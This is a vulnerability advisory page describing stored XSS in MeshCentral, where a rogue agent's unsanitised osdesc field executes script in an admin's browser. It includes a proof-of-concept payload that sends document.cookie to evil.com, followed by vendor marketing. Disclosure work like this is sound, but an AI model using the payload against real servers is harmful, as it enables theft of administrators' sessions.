Vulnerability DatabaseGHSA-c7hr-448w-65px

GHSA-c7hr-448w-65px
JavaScript vulnerability analysis and mitigation

Description

A rogue or compromised MeshAgent can inject arbitrary HTML/JavaScript via the osdesc (OS description) field in its coreinfo message. The server stores this value with zero HTML sanitization (meshagent.js:1903 only checks typeof == 'string'). When an admin views the device details panel, the value is rendered via addDeviceAttribute() → QH() which sets innerHTML, executing the payload in the admin's browser session. The main management UI CSP includes 'unsafe-inline' (webserver.js:7072), so inline event handlers and script execution are unrestricted.

Technical Details

// meshagent.js:1903 -- Agent input, only type check
if (typeof command.osdesc == 'string') { device.osdesc = command.osdesc;
change = 1; }
// default3.handlebars:8713 -- Rendered WITHOUT EscapeHtml()
if (node.osdesc) { x += addDeviceAttribute("Operating System", node.osdesc); }
// addDeviceAttribute() interpolates into HTML string, QH() sets innerHTML
// INCONSISTENCY: Same field IS escaped elsewhere:
// Line 13529: addDetailItem("Version", EscapeHtml(node.osdesc), s)
// Line 5760: EscapeHtml(node.osdesc ? node.osdesc : '')

Additional unescaped agent fields:

  • node.name unescaped in sharing dialog (line 4695), user group list (line 18625), permission dialogs (lines 18675, 19413) -- HIGH
  • cpuinfo.thermals[].InstanceName attribute injection (line 13502) -- MEDIUM
  • volumes[].name unescaped in file browser (line 12612) -- MEDIUM No server-side defense: CloneSafeNode() strips secrets but not XSS. validateObjectForMongo() only enforces length limits (1024 chars). No HTML sanitation exists anywhere in the agent→DB→UI pipeline.

Proof of Concept

Rogue agent sends via WebSocket:

{
  "action": "coreinfo",
  "osdesc": "<img src=x onerror='fetch(\"https://evil.com/steal?\"+document.cookie)'>",
  "name": "Legit-PC"
}

Payload fires when any admin views the device details panel. No click required. <img width="939" height="587" alt="image" src="https://github.com/user-attachments/assets/1ba372bb-73be-477b-95ca-fa5fc247f8f1" />


SourceNVD

Related JavaScript vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-c7hr-448w-65pxHIGH8.3
  • JavaScript logoJavaScript
  • meshcentral
NoYesAug 18, 2026
CVE-2026-47719HIGH8.2
  • JavaScript logoJavaScript
  • fuxa-server
NoNoAug 18, 2026
CVE-2026-47721MEDIUM6.3
  • JavaScript logoJavaScript
  • fuxa-server
NoNoAug 18, 2026
CVE-2026-63643MEDIUM6.3
  • JavaScript logoJavaScript
  • magicmirror
NoYesAug 18, 2026
CVE-2026-47720MEDIUM5.3
  • JavaScript logoJavaScript
  • fuxa-server
NoNoAug 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management